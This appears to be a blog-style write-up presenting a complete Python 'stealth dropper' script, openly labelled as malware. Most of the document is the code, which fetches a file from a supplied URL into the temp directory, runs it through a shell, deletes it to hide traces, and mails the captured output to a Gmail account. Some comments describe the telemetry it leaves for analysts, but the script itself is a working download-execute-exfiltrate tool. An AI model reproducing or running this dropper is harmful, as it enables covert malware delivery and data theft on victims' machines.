Malware - Stealth Dropper


m3rcer

A Cross Platform python script that downloads, executes, reports and cleans up after.

  • We implement:

    the tempfile module - to find the temp dir.

    the os module - to use platform independent functions like chdir to change to the temp dir.

    the subprocess module - to execute and remove the created file.

    the smtplib module - to create an SMTP instance to send our reports back to the provided mail address.

Code:

#!/usr/bin/env python

import requests, subprocess, smtplib, os, tempfile, argparse

# Cross-Platform
# Works by default with google's SMTP


def get_arguments():
    """Parse the command line and return the argparse namespace.

    ``--download-file`` and ``--email`` are mandatory: ``parser.error``
    prints the message and exits when either is missing.  ``--args`` and
    ``--password`` are optional and default to ``None``.  The mail
    password is taken from the command line, so it is exposed to
    anything that can read this process's argument vector.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--download-file", dest="download", help="File to Download")
    parser.add_argument("-a", "--args", dest="args", help="args if provided by Download file")
    parser.add_argument("-e", "--email", dest="email", help="Email-ID to recieve report")
    parser.add_argument("-p", "--password", dest="password", help="Password for provided Email-ID")
    options = parser.parse_args()
    if not options.download:
        # Missing URL: argparse prints the message to stderr and exits.
        parser.error("\n[-] Please specify a valid download url,  use --help for info.")
    if not options.email:
        # Missing report address: same exit path as above.
        parser.error("\n[-] Please specify a valid Email-ID,  use --help for info.")
    return options


def download(url):
    """Fetch ``url`` over HTTP(S) and write the body to the current directory.

    Returns the file name, which is simply the last ``/``-separated
    segment of the URL.  The body is written unconditionally: there is
    no status-code check, no timeout on ``requests.get``, and the name
    derived from the URL is not validated.  The caller chdir()s to the
    temp directory beforehand, so that is where the file is created.
    """
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    # Open File with write and binary mode
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)
    return file_name

def send_mail(email, password, message):
    """Send ``message`` from ``email`` to the same address via Gmail SMTP.

    Opens smtp.gmail.com:587, upgrades with STARTTLS, authenticates with
    the supplied password, and sends one message.  ``message`` is handed
    straight to ``sendmail`` with no headers added; the caller passes
    the raw ``subprocess.check_output`` bytes.  From a monitoring
    standpoint this is an authenticated outbound SMTP session to a
    public relay carrying command output.
    NOTE(review): ``starttls()`` is called without an SSL context, so
    whether the server certificate is verified depends on the running
    Python version's smtplib default -- confirm.
    """
    # Google's SMTP definition
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


# Script body.  Observable sequence for anyone analysing or detecting it:
# an outbound HTTP GET, a new file created in the OS temp directory that
# is executed through a shell and then deleted, and an authenticated
# outbound SMTP session that carries the command output.  The mail
# credentials arrive on the command line (see get_arguments).
print("""\n\n\n
                                                        π•Ύπ–™π–Šπ–†π–‘π–™π–-π•―π–—π–”π–•π–•π–Šπ–—
    """)


print("\n{-} Finding /tmp dir.")
options = get_arguments()


# Find /tmp dir on OS
# tempfile.gettempdir() is platform-independent; the process cwd is moved
# there so download() writes the file into the temp directory.
temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
print("{+} /tmp dir found!")

# Download
file_name = download(options.download)
print("\n{+} File " + file_name + " has been succesfully dropped!")
# Execute
# shell=True with a concatenated command string: the file name taken from
# the URL and the --args value are passed to the shell verbatim.  Output
# is captured (not printed) and later becomes the mail body.  Note that
# options.args is concatenated even though --args is optional.
result = subprocess.check_output(file_name + " " +  options.args, shell=True)
print("{+} File " + file_name + " has been succesfully Executed!")
# Remove
# The dropped file is unlinked immediately after execution, so only
# creation/execution telemetry remains on disk-oriented sensors.
os.remove(file_name)
print("{+} File " + file_name + " has been succesfully Removed!")
# Report
# result is bytes; send_mail passes it to sendmail without headers.
send_mail(options.email, options.password, result)
print("\n\n{!} Report sent to: " + options.email)

Output:

Console:

Image

Report:

Image